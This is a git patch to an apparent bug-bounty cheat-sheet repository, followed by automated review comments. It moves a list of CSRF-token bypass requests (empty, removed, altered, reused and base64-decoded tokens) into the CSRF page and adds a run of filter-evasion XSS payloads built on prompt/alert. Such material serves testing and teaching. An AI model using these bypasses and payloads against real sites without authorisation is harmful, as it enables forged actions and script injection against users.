From 4f516068135b09580f3f9d6323493b5c9e5928a3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Tue, 8 Nov 2022 18:29:04 +0700 Subject: [PATCH] feat: added XSS payloads to bypass WAF --- Bypass/Bypass 304.md | 30 -------- Bypass/Bypass CSRF.md | 120 -------------------------------- Cross Site Request Forgery.md | 126 +++++++++++++++++++++++++++++++++- Cross Site Scripting.md | 92 +++++++++++++++++++++---- README.md | 10 +-- 5 files changed, 207 insertions(+), 171 deletions(-) delete mode 100644 Bypass/Bypass 304.md delete mode 100644 Bypass/Bypass CSRF.md diff --git a/Bypass/Bypass 304.md b/Bypass/Bypass 304.md deleted file mode 100644 index 21b62cc..0000000 --- a/Bypass/Bypass 304.md +++ /dev/null @@ -1,30 +0,0 @@ -# Bypass 304 (Not Modified) - -1. Delete "If-None-Match" header -``` -GET /admin HTTP/1.1 -Host: target.com -If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" -``` -Try this to bypass -``` -GET /admin HTTP/1.1 -Host: target.com -``` - -2. Adding random character in the end of "If-None-Match" header -``` -GET /admin HTTP/1.1 -Host: target.com -If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" -``` -Try this to bypass -``` -GET /admin HTTP/1.1 -Host: target.com -Host: target.com -If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b -``` - -## References -* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521) diff --git a/Bypass/Bypass CSRF.md b/Bypass/Bypass CSRF.md deleted file mode 100644 index f6bde6b..0000000 --- a/Bypass/Bypass CSRF.md +++ /dev/null 
@@ -1,120 +0,0 @@ -# Bypass CSRF - -1. Change single character -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab -``` - -2. Sending empty value of token -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token= -``` - -3. Replace the token with same length -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaabaa -``` -4. Changing POST / GET method -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 -Host: target.com -... -``` - -5. Remove the token from request -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456 -``` - -6. Use another user's valid token -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=ANOTHER_VALID_TOKEN -``` - -7. Try to decrypt hash -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=MTIzNDU2 -``` -MTIzNDU2 => 123456 with base64 - -8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic -``` -POST /register HTTP/1.1 -Host: target.com -... 
- -username=dapos&password=123456&token=vi802jg9f8akd9j123 -``` -When we register again, the request like this -``` -POST /register HTTP/1.1 -Host: target.com -... - -username=dapos&password=123456&token=vi802jg9f8akd9j124 -``` -If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part diff --git a/Cross Site Request Forgery.md b/Cross Site Request Forgery.md index 2fcdafe..87f86f7 100644 --- a/Cross Site Request Forgery.md +++ b/Cross Site Request Forgery.md @@ -4,7 +4,7 @@ Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated ## Where to find -Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md) +Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. ## How to exploit 1. HTML GET Method @@ -92,4 +92,126 @@ xhr.send('{"role":admin}');
-``` \ No newline at end of file +``` + +# Bypass CSRF Token +But in some cases, even though there is a CSRF token on the form on the website. CSRF tokens can still be bypassed by doing a few things: + +1. Change single character +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab +``` + +2. Sending empty value of token +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token= +``` + +3. Replace the token with same length +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaabaa +``` +4. Changing POST / GET method +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 +Host: target.com +... +``` + +5. Remove the token from request +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456 +``` + +6. Use another user's valid token +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=ANOTHER_VALID_TOKEN +``` + +7. Try to decrypt hash +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=MTIzNDU2 +``` +MTIzNDU2 => 123456 with base64 + +8. 
Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=vi802jg9f8akd9j123 +``` +When we register again, the request like this +``` +POST /register HTTP/1.1 +Host: target.com +... + +username=dapos&password=123456&token=vi802jg9f8akd9j124 +``` +If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md index 1109185..59b1ecc 100644 --- a/Cross Site Scripting.md +++ b/Cross Site Scripting.md @@ -344,31 +344,22 @@ javascript://%250Aalert(1) ``` + - - - - - - -Function("\x61\x6c\x65\x72\x74\x28\x31\x29")(); "> -%2sscript%2ualert()%2s/script%2u -xss popup - - +%2sscript%2ualert()%2s/script%2u "Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm)) [1].map(confirm)'ale'+'rt'()a l e r t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``) + + @@ -379,11 +370,84 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")(); + + + +<--` --!> + + + +H#x + +'">
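Review bot: the `Bypass/Bypass 304.md` deletion is not covered by the commit message (`feat: added XSS payloads to bypass WAF`) and, unlike `Bypass/Bypass CSRF.md`, its content is not relocated anywhere in the visible diff; the diffstat lists `README.md | 10 +-`, but that hunk does not appear in this patch, so it cannot be confirmed here that the README link to the file was removed along with it. Either move the ETag/If-None-Match material under a section of an existing page, as was done for the CSRF list, or state in the message why it is being dropped.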
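Review bot: the `Bypass/Bypass CSRF.md` deletion is a straight move of the whole list into `Cross Site Request Forgery.md` (the `+` lines there match the `-` lines here one for one), so no content is lost; the trade-off is that the old path `Bypass/Bypass%20CSRF.md` now 404s for anyone who linked it from outside the repo. A line in the commit message saying the file was merged rather than removed would make `git log` useful to those readers.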
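Review bot: removing the `[List](.../Bypass/Bypass%20CSRF.md)` link in the `Where to find` hunk is right since the file is gone, but the replacement line now stops at "likely to be vulnerable to a CSRF attack." with no pointer to the new `Bypass CSRF Token` section added further down the same file; keep the cross-reference as an in-page anchor so this paragraph still tells the reader where to look when a token is present. While the line is being touched, the unchanged context "Try submit the form" should read "Try submitting the form".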
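Review bot: `# Bypass CSRF Token` is a level-1 heading in a file whose other sections (`## Where to find`, `## How to exploit`, visible as context in the first hunk) are level 2; use `## Bypass CSRF Token` so it nests under the page title. In the same hunk, the lead-in "But in some cases, even though there is a CSRF token on the form on the website. CSRF tokens can still be bypassed" is a fragment and should be one sentence; item 7 "Try to decrypt hash" describes a base64 decode (`MTIzNDU2 => 123456`), which is neither a hash nor encryption, so "Try to decode the token" is the accurate wording; item 4 is missing the blank line that separates every other item from the preceding fence; and item 8's "composed by 2 parts, one of them remains static while the others one dynamic" should read "composed of two parts, one static and the other dynamic". Since each item corresponds to a distinct server-side validation flaw (token value never compared, missing or empty token accepted, token not bound to the user's session, validation skipped for GET, token predictable or merely encoded), a short "why this works" line per item would let readers tell a real finding from a coincidence.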
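Review bot: in the first `Cross Site Scripting.md` hunk, `%2sscript%2ualert()%2s/script%2u` is removed and re-added within the same hunk, so the net effect is only a reordering; drop one side so the diff shows the real change. The new `+` line beginning `"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>` arrives as one continuous run of many payloads with no line breaks between them (`"%01onClick=prompt(1)>`, `"onClick="(prompt)(1)"`, `a l e r t(1)` and the rest are all joined), whereas the rest of the file keeps one payload per line inside the fence; split them so entries can be copied and diffed individually. The hunk also drops `Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();` and `xss popup` without explanation; the second hunk's `@@` header shows the `Function(...)` line still present at line 379, so if these were duplicates, say so in the message.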
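Review bot: the commit message says the second `Cross Site Scripting.md` hunk adds payloads that bypass a WAF, but the added block carries no heading naming which WAF or filter rule they were observed to get past, in which injection context (attribute value, tag body, URL), or where they were published; without that, a defender maintaining the filter cannot reproduce the claim, and a reader cannot tell whether entries such as `H#x` or `'">` are complete payloads or fragments meant to be combined with others. A one-line heading per group giving the filter, the context and a source link would make the list verifiable.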